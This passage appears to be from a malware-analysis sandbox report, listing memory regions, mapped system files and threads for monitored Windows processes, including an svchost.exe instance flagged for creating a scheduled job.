id = 773
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 774
start_va = 0x8a0000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 775
start_va = 0x1e90000
end_va = 0x1e90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "conhostv2.dll.mui"
filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")
Region:
id = 776
start_va = 0x1ea0000
end_va = 0x1ea1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ea0000"
filename = ""
Region:
id = 777
start_va = 0x7ffa080f0000
end_va = 0x7ffa08363fff
monitored = 0
entry_point = 0x7ffa08160400
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")
Region:
id = 778
start_va = 0x1eb0000
end_va = 0x1eb0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 779
start_va = 0x1ec0000
end_va = 0x1ec1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ec0000"
filename = ""
Thread:
id = 13
os_tid = 0x10e0
Thread:
id = 14
os_tid = 0x10e4
Thread:
id = 15
os_tid = 0x10dc
Thread:
id = 16
os_tid = 0x10cc
Process:
id = "4"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x75956000"
os_pid = "0x360"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "created_scheduled_job"
parent_id = "2"
os_parent_pid = "0x214"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000abff" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 803
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 804
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 805
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 806
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 807
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 808
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 809
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 810
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 811
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 812
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 813
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 814
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 815
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 816
start_va = 0x400000
end_va = 0x400fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 817
start_va = 0x410000
end_va = 0x416fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 818
start_va = 0x420000
end_va = 0x420fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000420000"
filename = ""
Region:
id = 819
start_va = 0x430000
end_va = 0x431fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "dosvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui")
Region:
id = 820
start_va = 0x440000
end_va = 0x444fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "winnlsres.dll"
filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")
Region:
id = 821
start_va = 0x450000
end_va = 0x45ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "winnlsres.dll.mui"
filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")
Region:
id = 822
start_va = 0x460000
end_va = 0x462fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mswsock.dll.mui"
filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui")
Region:
id = 823
start_va = 0x480000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 824
start_va = 0x540000
end_va = 0x546fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 825
start_va = 0x550000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 826
start_va = 0x5d0000
end_va = 0x5d6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 827
start_va = 0x5e0000
end_va = 0x5e9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "crypt32.dll.mui"
filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui")
Region:
id = 828
start_va = 0x5f0000
end_va = 0x5f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005f0000"
filename = ""
Region:
id = 829
start_va = 0x600000
end_va = 0x6fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 830
start_va = 0x700000
end_va = 0x887fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000700000"
filename = ""
Region:
id = 831
start_va = 0x890000
end_va = 0x890fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000890000"
filename = ""
Region:
id = 832
start_va = 0x8a0000
end_va = 0x8a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008a0000"
filename = ""
Region:
id = 833
start_va = 0x8b0000
end_va = 0x8bcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 834
start_va = 0x8c0000
end_va = 0x8c1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008c0000"
filename = ""
Region:
id = 835
start_va = 0x8e0000
end_va = 0x8e3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 836
start_va = 0x8f0000
end_va = 0x8f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008f0000"
filename = ""
Region:
id = 837
start_va = 0x900000
end_va = 0x9fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 838
start_va = 0xa00000
end_va = 0xb80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a00000"
filename = ""
Region:
id = 839
start_va = 0xb90000
end_va = 0xc8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b90000"
filename = ""
Region:
id = 840
start_va = 0xc90000
end_va = 0xc93fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 841
start_va = 0xca0000
end_va = 0xcb0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 842
start_va = 0xcc0000
end_va = 0xcc6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cc0000"
filename = ""
Region:
id = 843
start_va = 0xcd0000
end_va = 0xd14fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db")
Region:
id = 844
start_va = 0xd20000
end_va = 0xd2cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "iphlpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui")
Region:
id = 845
start_va = 0xd30000
end_va = 0xd36fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d30000"
filename = ""
Region:
id = 846
start_va = 0xdc0000
end_va = 0xdc8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vsstrace.dll.mui"
filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")
Region:
id = 847
start_va = 0xdd0000
end_va = 0xdd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000dd0000"
filename = ""
Region:
id = 848
start_va = 0xde0000
end_va = 0xde1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "activeds.dll.mui"
filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui")
Region:
id = 849
start_va = 0xdf0000
end_va = 0xdf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000df0000"
filename = ""
Region:
id = 850
start_va = 0xe00000
end_va = 0xefffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e00000"
filename = ""
Region:
id = 851
start_va = 0xf00000
end_va = 0xffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 852
start_va = 0x1000000
end_va = 0x1336fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 853
start_va = 0x1340000
end_va = 0x143ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001340000"
filename = ""
Region:
id = 854
start_va = 0x1440000
end_va = 0x153ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001440000"
filename = ""
Region:
id = 855
start_va = 0x1540000
end_va = 0x15bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001540000"
filename = ""
Region:
id = 856
start_va = 0x15c0000
end_va = 0x15c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000015c0000"
filename = ""
Region:
id = 857
start_va = 0x15d0000
end_va = 0x15e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1256.nls"
filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls")
Region:
id = 858
start_va = 0x15f0000
end_va = 0x15f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000015f0000"
filename = ""
Region:
id = 859
start_va = 0x1600000
end_va = 0x16fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001600000"
filename = ""
Region:
id = 860
start_va = 0x1700000
end_va = 0x17fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001700000"
filename = ""
Region:
id = 861
start_va = 0x1800000
end_va = 0x18dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 862
start_va = 0x18e0000
end_va = 0x18f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1251.nls"
filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls")
Region:
id = 863
start_va = 0x1900000
end_va = 0x19fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 864
start_va = 0x1a00000
end_va = 0x1a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a00000"
filename = ""
Region:
id = 865
start_va = 0x1a80000
end_va = 0x1b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a80000"
filename = ""
Region:
id = 866
start_va = 0x1b80000
end_va = 0x1c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b80000"
filename = ""
Region:
id = 867
start_va = 0x1c80000
end_va = 0x1d7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c80000"
filename = ""
Region:
id = 868
start_va = 0x1d80000
end_va = 0x1e7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d80000"
filename = ""
Region:
id = 869
start_va = 0x1e80000
end_va = 0x1f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e80000"
filename = ""
Region:
id = 870
start_va = 0x1f80000
end_va = 0x207ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f80000"
filename = ""
Region:
id = 871
start_va = 0x2080000
end_va = 0x217ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002080000"
filename = ""
Region:
id = 872
start_va = 0x2180000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 873
start_va = 0x2280000
end_va = 0x237ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 874
start_va = 0x2380000
end_va = 0x247ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002380000"
filename = ""
Region:
id = 875
start_va = 0x2480000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 876
start_va = 0x2500000
end_va = 0x25fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 877
start_va = 0x2600000
end_va = 0x26fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 878
start_va = 0x2700000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 879
start_va = 0x2800000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 880
start_va = 0x2900000
end_va = 0x29fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 881
start_va = 0x2a00000
end_va = 0x2afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 882
start_va = 0x2b00000
end_va = 0x2bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 883
start_va = 0x2c00000
end_va = 0x2c8dfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 884
start_va = 0x2c90000
end_va = 0x2d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c90000"
filename = ""
Region:
id = 885
start_va = 0x2d10000
end_va = 0x2e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d10000"
filename = ""
Region:
id = 886
start_va = 0x2e10000
end_va = 0x2f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e10000"
filename = ""
Region:
id = 887
start_va = 0x2f10000
end_va = 0x2f8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f10000"
filename = ""
Region:
id = 888
start_va = 0x2f90000
end_va = 0x2fa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1254.nls"
filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls")
Region:
id = 889
start_va = 0x2fb0000
end_va = 0x2fc0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1250.nls"
filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls")
Region:
id = 890
start_va = 0x2fd0000
end_va = 0x2fe0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1253.nls"
filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls")
Region:
id = 891
start_va = 0x2ff0000
end_va = 0x2ff0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "usocore.dll.mui"
filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui")
Region:
id = 892
start_va = 0x3000000
end_va = 0x30fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003000000"
filename = ""
Region:
id = 893
start_va = 0x3100000
end_va = 0x317ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003100000"
filename = ""
Region:
id = 894
start_va = 0x3190000
end_va = 0x328ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003190000"
filename = ""
Region:
id = 895
start_va = 0x3290000
end_va = 0x330ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003290000"
filename = ""
Region:
id = 896
start_va = 0x3310000
end_va = 0x338ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003310000"
filename = ""
Region:
id = 897
start_va = 0x3390000
end_va = 0x3396fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003390000"
filename = ""
Region:
id = 898
start_va = 0x33a0000
end_va = 0x33b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1257.nls"
filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls")
Region:
id = 899
start_va = 0x33c0000
end_va = 0x33d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1255.nls"
filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")
Region:
id = 900
start_va = 0x33e0000
end_va = 0x33e6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000033e0000"
filename = ""
Region:
id = 901
start_va = 0x33f0000
end_va = 0x346ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000033f0000"
filename = ""
Region:
id = 902
start_va = 0x3470000
end_va = 0x3497fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_932.nls"
filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls")
Region:
id = 903
start_va = 0x34a0000
end_va = 0x34b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_874.nls"
filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls")
Region:
id = 904
start_va = 0x34c0000
end_va = 0x34c6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000034c0000"
filename = ""
Region:
id = 905
start_va = 0x34d0000
end_va = 0x35cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000034d0000"
filename = ""
Region:
id = 906
start_va = 0x35d0000
end_va = 0x364ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000035d0000"
filename = ""
Region:
id = 907
start_va = 0x3650000
end_va = 0x3660fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1258.nls"
filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls")
Region:
id = 908
start_va = 0x3670000
end_va = 0x376ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003670000"
filename = ""
Region:
id = 909
start_va = 0x3770000
end_va = 0x386ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003770000"
filename = ""
Region:
id = 910
start_va = 0x3870000
end_va = 0x38effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003870000"
filename = ""
Region:
id = 911
start_va = 0x3900000
end_va = 0x39fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003900000"
filename = ""
Region:
id = 912
start_va = 0x3a00000
end_va = 0x3afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a00000"
filename = ""
Region:
id = 913
start_va = 0x3b00000
end_va = 0x3bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b00000"
filename = ""
Region:
id = 914
start_va = 0x3c00000
end_va = 0x3c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c00000"
filename = ""
Region:
id = 915
start_va = 0x3c80000
end_va = 0x3cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c80000"
filename = ""
Region:
id = 916
start_va = 0x3d00000
end_va = 0x3dfffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003d00000"
filename = ""
Region:
id = 917
start_va = 0x3e00000
end_va = 0x3efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003e00000"
filename = ""
Region:
id = 918
start_va = 0x3f00000
end_va = 0x3ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003f00000"
filename = ""
Region:
id = 919
start_va = 0x4000000
end_va = 0x40fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004000000"
filename = ""
Region:
id = 920
start_va = 0x4100000
end_va = 0x41fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004100000"
filename = ""
Region:
id = 921
start_va = 0x4200000
end_va = 0x42fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004200000"
filename = ""
Region:
id = 922
start_va = 0x4300000
end_va = 0x43fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004300000"
filename = ""
Region:
id = 923
start_va = 0x4400000
end_va = 0x44fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004400000"
filename = ""
Region:
id = 924
start_va = 0x4500000
end_va = 0x45fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004500000"
filename = ""
Region:
id = 925
start_va = 0x4600000
end_va = 0x46fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004600000"
filename = ""
Region:
id = 926
start_va = 0x4700000
end_va = 0x47fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004700000"
filename = ""
Region:
id = 927
start_va = 0x4800000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004800000"
filename = ""
Region:
id = 928
start_va = 0x4900000
end_va = 0x49fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 929
start_va = 0x4a00000
end_va = 0x4afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a00000"
filename = ""
Region:
id = 930
start_va = 0x4b00000
end_va = 0x4b30fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_949.nls"
filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls")
Region:
id = 931
start_va = 0x4b40000
end_va = 0x4b70fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_936.nls"
filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls")
Region:
id = 932
start_va = 0x4b80000
end_va = 0x4bb0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_950.nls"
filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls")
Region:
id = 933
start_va = 0x4c00000
end_va = 0x4cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c00000"
filename = ""
Region:
id = 934
start_va = 0x4d00000
end_va = 0x4dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 935
start_va = 0x4e00000
end_va = 0x4e7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 936
start_va = 0x5200000
end_va = 0x52fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005200000"
filename = ""
Region:
id = 937
start_va = 0x5700000
end_va = 0x57fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005700000"
filename = ""
Region:
id = 938
start_va = 0x5900000
end_va = 0x59fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005900000"
filename = ""
Region:
id = 939
start_va = 0x5a00000
end_va = 0x5afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a00000"
filename = ""
Region:
id = 940
start_va = 0x5b00000
end_va = 0x5bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005b00000"
filename = ""
Region:
id = 941
start_va = 0x5c00000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005c00000"
filename = ""
